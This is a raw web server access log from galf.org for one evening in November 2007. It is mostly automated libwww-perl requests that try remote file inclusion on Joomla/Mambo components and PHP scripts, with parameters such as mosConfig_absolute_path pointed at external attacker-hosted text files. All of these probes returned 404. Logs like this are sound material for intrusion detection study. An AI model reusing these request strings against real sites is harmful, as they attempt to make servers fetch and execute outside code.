65.23.154.7 - - [18/Nov/2007:17:47:14 -0800] "GET /logs/access_070917.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
65.23.154.7 - - [18/Nov/2007:17:47:14 -0800] "GET /logs/access_070917.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.38.129.76 - - [18/Nov/2007:17:48:10 -0800] "GET /logs/access_070723.log//template.php?pagina=http://www.schmid-telecom.com/ide.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.202.63.86 - - [18/Nov/2007:17:48:55 -0800] "GET /logs/access_070806.log//index.php?pagina=http://124.0.201.20/bbs000/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.175.205.226 - - [18/Nov/2007:17:49:13 -0800] "GET /logs/access_070924.log/?path[docroot]=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.25.195.72 - - [18/Nov/2007:17:50:05 -0800] "GET /logs/access_070903.log//popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.webdiodos.gr/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.25.195.72 - - [18/Nov/2007:17:50:05 -0800] "GET //popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.webdiodos.gr/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.25.195.72 - - [18/Nov/2007:17:50:05 -0800] "GET /logs//popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.webdiodos.gr/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.25.195.72 - - [18/Nov/2007:17:50:08 -0800] "GET /logs/access_070903.log//popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.webdiodos.gr/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.25.195.72 - - [18/Nov/2007:17:50:08 -0800] "GET //popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.webdiodos.gr/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.25.195.72 - - [18/Nov/2007:17:50:08 -0800] "GET /logs//popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.webdiodos.gr/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.30.214.230 - - [18/Nov/2007:17:53:18 -0800] "GET /logs/access_070910.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
87.118.106.153 - - [18/Nov/2007:17:53:33 -0800] "GET /logs/access_070827.log//include.php?path[docroot]=http://myhost.helloweb.eu/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
122.153.16.5 - - [18/Nov/2007:17:53:41 -0800] "GET /logs/access_070910.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s1ko.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
122.153.16.5 - - [18/Nov/2007:17:53:41 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s1ko.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
122.153.16.5 - - [18/Nov/2007:17:53:46 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s1ko.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
72.29.67.146 - - [18/Nov/2007:17:53:54 -0800] "GET //modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://fethiyedh.gov.tr/img/inc/2/file2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.118.106.153 - - [18/Nov/2007:17:54:07 -0800] "GET /logs/access_071028.log//include.php?path[docroot]=http://myhost.helloweb.eu/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.118.106.153 - - [18/Nov/2007:17:54:27 -0800] "GET /logs/access_070730.log//include.php?path[docroot]=http://myhost.helloweb.eu/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
122.152.140.206 - - [18/Nov/2007:17:54:55 -0800] "GET / HTTP/1.1" 200 1048 "-" "Baiduspider+(+http://www.baidu.com/search/spider_jp.html)" "www.galf.org"
209.200.254.233 - - [18/Nov/2007:17:56:05 -0800] "GET /logs/access_071029.log//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://h4x0r-s.org/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.200.254.233 - - [18/Nov/2007:17:56:05 -0800] "GET //components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://h4x0r-s.org/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.200.254.233 - - [18/Nov/2007:17:56:05 -0800] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://h4x0r-s.org/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.168.55.27 - - [18/Nov/2007:17:57:11 -0800] "GET /logs/access_071015.log/test.php?page=http://www.inteligentesite.com.br/arquivos/marajoara/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
80.168.55.27 - - [18/Nov/2007:17:57:18 -0800] "GET /logs/access_070924.log/test.php?page=http://www.inteligentesite.com.br/arquivos/marajoara/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.75.35.118 - - [18/Nov/2007:17:58:08 -0800] "GET /logs/access_070716.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://gds.hu/voodoo/crotz? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.75.35.118 - - [18/Nov/2007:17:58:08 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://gds.hu/voodoo/crotz? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.43.222.198 - - [18/Nov/2007:17:58:18 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.43.222.198 - - [18/Nov/2007:17:58:18 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.200.254.233 - - [18/Nov/2007:17:58:58 -0800] "GET /logs/access_070827.log//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://h4x0r-s.org/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
72.30.216.106 - - [18/Nov/2007:17:59:25 -0800] "GET /logs/access_070903.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
66.249.73.202 - - [18/Nov/2007:17:59:47 -0800] "GET /cendoc/pdf/Ugarteche-Intolerancia.pdf HTTP/1.1" 404 275 "-" "Googlebot/2.1 (+http://www.google.com/bot.html)" "www.galf.org"
201.233.222.208 - - [18/Nov/2007:18:01:02 -0800] "GET / HTTP/1.1" 200 1048 "http://www.lesbianas.tv/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9" "www.galf.org"
216.75.35.118 - - [18/Nov/2007:18:01:15 -0800] "GET /logs/access_070820.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://gds.hu/voodoo/crotz? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
201.233.222.208 - - [18/Nov/2007:18:01:26 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9" "www.galf.org"
87.119.200.212 - - [18/Nov/2007:18:02:24 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.schmid-telecom.com/ide.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.119.200.212 - - [18/Nov/2007:18:02:24 -0800] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.schmid-telecom.com/ide.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.216.195.2 - - [18/Nov/2007:18:04:43 -0800] "GET /logs//popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.lolz.kit.net/safe/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.216.195.2 - - [18/Nov/2007:18:04:43 -0800] "GET //popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.lolz.kit.net/safe/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.67.146 - - [18/Nov/2007:18:05:10 -0800] "GET /logs/access_071014.log//modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://fethiyedh.gov.tr/img/inc/2/file2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.67.146 - - [18/Nov/2007:18:05:10 -0800] "GET /logs//modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://fethiyedh.gov.tr/img/inc/2/file2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.119.200.212 - - [18/Nov/2007:18:05:16 -0800] "GET /logs/access_070716.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.schmid-telecom.com/ide.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.119.200.212 - - [18/Nov/2007:18:05:16 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.schmid-telecom.com/ide.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.29.67.146 - - [18/Nov/2007:18:06:15 -0800] "GET /logs/access_070625.log//modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://fethiyedh.gov.tr/img/inc/2/file2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.155.179.18 - - [18/Nov/2007:18:06:25 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.lolz.kit.net/safe/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.155.179.18 - - [18/Nov/2007:18:06:25 -0800] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.lolz.kit.net/safe/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.38.71.3 - - [18/Nov/2007:18:06:31 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://permaya.org/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.38.71.3 - - [18/Nov/2007:18:06:31 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://permaya.org/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.216.195.2 - - [18/Nov/2007:18:06:54 -0800] "GET /logs/access_071014.log//popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.lolz.kit.net/safe/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
69.13.63.190 - - [18/Nov/2007:18:07:10 -0800] "GET //modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.cantorque.ca/themes/cantorque/list.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.24.17.69 - - [18/Nov/2007:18:07:11 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://permaya.org/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.24.17.69 - - [18/Nov/2007:18:07:11 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://permaya.org/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.119.200.212 - - [18/Nov/2007:18:08:06 -0800] "GET /logs/access_070820.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.schmid-telecom.com/ide.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.50.211.121 - - [18/Nov/2007:18:08:34 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.eyeconect.com/counter/database/includes/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
80.53.103.36 - - [18/Nov/2007:18:10:00 -0800] "GET /logs/access_071014.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.53.103.36 - - [18/Nov/2007:18:10:00 -0800] "GET /logs/access_071014.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.53.103.36 - - [18/Nov/2007:18:10:00 -0800] "GET /logs/access_071014.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.53.103.36 - - [18/Nov/2007:18:10:00 -0800] "GET /logs/access_071014.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.53.103.36 - - [18/Nov/2007:18:10:00 -0800] "GET /logs/access_071014.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.53.103.36 - - [18/Nov/2007:18:10:01 -0800] "GET /logs/access_071014.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.53.103.36 - - [18/Nov/2007:18:10:03 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.53.103.36 - - [18/Nov/2007:18:10:03 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.53.103.36 - - [18/Nov/2007:18:10:03 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.53.103.36 - - [18/Nov/2007:18:10:03 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.53.103.36 - - [18/Nov/2007:18:10:03 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
80.53.103.36 - - [18/Nov/2007:18:10:03 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.53.103.36 - - [18/Nov/2007:18:10:05 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.53.103.36 - - [18/Nov/2007:18:10:05 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.53.103.36 - - [18/Nov/2007:18:10:05 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.53.103.36 - - [18/Nov/2007:18:10:05 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.53.103.36 - - [18/Nov/2007:18:10:05 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.53.103.36 - - [18/Nov/2007:18:10:05 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.102.38 - - [18/Nov/2007:18:10:10 -0800] "HEAD / HTTP/1.1" 200 0 "http://www.eurip.com" "EuripBot/1.0 (+http://www.eurip.com) PreCheck"
72.29.67.146 - - [18/Nov/2007:18:10:14 -0800] "GET //modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://fethiyedh.gov.tr/img/inc/2/file2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.171.48.89 - - [18/Nov/2007:18:10:49 -0800] "GET /logs/access.log/main.php?pagina=http://www.inteligentesite.com.br/arquivos/marajoara/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
202.171.48.89 - - [18/Nov/2007:18:10:54 -0800] "GET /logs/main.php?pagina=http://www.inteligentesite.com.br/arquivos/marajoara/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.53.103.36 - - [18/Nov/2007:18:11:06 -0800] "GET /logs/access_070917.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.53.103.36 - - [18/Nov/2007:18:11:06 -0800] "GET /logs/access_070917.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.53.103.36 - - [18/Nov/2007:18:11:06 -0800] "GET /logs/access_070917.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.53.103.36 - - [18/Nov/2007:18:11:06 -0800] "GET /logs/access_070917.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.53.103.36 - - [18/Nov/2007:18:11:06 -0800] "GET /logs/access_070917.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.53.103.36 - - [18/Nov/2007:18:11:06 -0800] "GET /logs/access_070917.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.155.179.18 - - [18/Nov/2007:18:12:01 -0800] "GET /logs/access_070826.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.lolz.kit.net/safe/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.155.179.18 - - [18/Nov/2007:18:12:02 -0800] "GET /logs/access_070827.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.lolz.kit.net/safe/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.119.200.212 - - [18/Nov/2007:18:12:42 -0800] "GET /logs//akocomments.php?mosConfig_absolute_path=http://www.schmid-telecom.com/ide.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.119.200.212 - - [18/Nov/2007:18:12:43 -0800] "GET //akocomments.php?mosConfig_absolute_path=http://www.schmid-telecom.com/ide.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.13.63.190 - - [18/Nov/2007:18:15:38 -0800] "GET /logs/access_071014.log//modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.cantorque.ca/themes/cantorque/list.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.13.63.190 - - [18/Nov/2007:18:15:38 -0800] "GET /logs//modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.cantorque.ca/themes/cantorque/list.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
66.197.235.245 - - [18/Nov/2007:18:15:39 -0800] "GET /logs/access_071014.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://supermanisdead.net/le_admin/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.197.235.245 - - [18/Nov/2007:18:15:40 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://supermanisdead.net/le_admin/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.197.235.245 - - [18/Nov/2007:18:15:40 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://supermanisdead.net/le_admin/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.75.35.118 - - [18/Nov/2007:18:15:49 -0800] "GET /logs/access_070723.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://gds.hu/voodoo/crotz? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
216.75.35.118 - - [18/Nov/2007:18:15:49 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://gds.hu/voodoo/crotz? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
216.75.35.118 - - [18/Nov/2007:18:15:49 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://gds.hu/voodoo/crotz? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
66.197.235.245 - - [18/Nov/2007:18:16:02 -0800] "GET /logs/access_070917.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://supermanisdead.net/le_admin/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.197.235.245 - - [18/Nov/2007:18:16:45 -0800] "GET /logs/access_071014.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://supermanisdead.net/le_admin/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.197.235.245 - - [18/Nov/2007:18:16:45 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://supermanisdead.net/le_admin/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.197.235.245 - - [18/Nov/2007:18:16:46 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://supermanisdead.net/le_admin/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.13.63.190 - - [18/Nov/2007:18:16:47 -0800] "GET /logs/access_070625.log//modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.cantorque.ca/themes/cantorque/list.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.197.235.245 - - [18/Nov/2007:18:17:06 -0800] "GET /logs/access_070917.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://supermanisdead.net/le_admin/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
158.251.4.149 - - [18/Nov/2007:18:17:35 -0800] "GET /logs/access_070716.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.inteligentesite.com.br/arquivos/marajoara/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.207.157.44 - - [18/Nov/2007:18:17:57 -0800] "GET /logs/access_071008.log/index.php?p=http://www.mediart.lu/fr//did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.62" "www.galf.org"
200.207.157.44 - - [18/Nov/2007:18:17:57 -0800] "GET /index.php?p=http://www.mediart.lu/fr//did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.62" "www.galf.org"
200.207.157.44 - - [18/Nov/2007:18:17:58 -0800] "GET /logs/index.php?p=http://www.mediart.lu/fr//did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.62" "www.galf.org"
213.254.226.234 - - [18/Nov/2007:18:19:00 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.254.226.234 - - [18/Nov/2007:18:19:00 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
72.29.67.146 - - [18/Nov/2007:18:20:09 -0800] "GET /logs/access_071014.log//modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://fethiyedh.gov.tr/img/inc/2/file2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
72.29.67.146 - - [18/Nov/2007:18:20:09 -0800] "GET /logs//modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://fethiyedh.gov.tr/img/inc/2/file2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
72.29.67.146 - - [18/Nov/2007:18:21:07 -0800] "GET /logs/access_070625.log//modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://fethiyedh.gov.tr/img/inc/2/file2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
68.180.250.121 - - [18/Nov/2007:18:21:17 -0800] "GET /logs/access_070903.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
122.153.16.5 - - [18/Nov/2007:18:24:51 -0800] "GET /logs/access_070910.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s1ko.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.216.195.2 - - [18/Nov/2007:18:25:11 -0800] "GET /logs/access_071028.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://h4x0r-s.org/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.216.195.2 - - [18/Nov/2007:18:25:11 -0800] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://h4x0r-s.org/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.216.195.2 - - [18/Nov/2007:18:25:11 -0800] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://h4x0r-s.org/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.208.16.34 - - [18/Nov/2007:18:26:48 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://permaya.org/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
74.208.16.34 - - [18/Nov/2007:18:26:48 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://permaya.org/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
66.249.73.202 - - [18/Nov/2007:18:27:02 -0800] "GET /cendoc/pdf/Galf-Ese-secreto.pdf HTTP/1.1" 404 275 "-" "Googlebot/2.1 (+http://www.google.com/bot.html)" "www.galf.org"
209.216.195.2 - - [18/Nov/2007:18:27:48 -0800] "GET /logs/access_071029.log//index.php?pag=http://h4x0r-s.org/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.216.195.2 - - [18/Nov/2007:18:27:48 -0800] "GET //index.php?pag=http://h4x0r-s.org/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.216.195.2 - - [18/Nov/2007:18:27:48 -0800] "GET /logs//index.php?pag=http://h4x0r-s.org/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.216.195.2 - - [18/Nov/2007:18:27:57 -0800] "GET /logs/access_071008.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://h4x0r-s.org/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.200.254.233 - - [18/Nov/2007:18:28:08 -0800] "GET /logs/access_071015.log//index.php?x=http://h4x0r-s.org/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
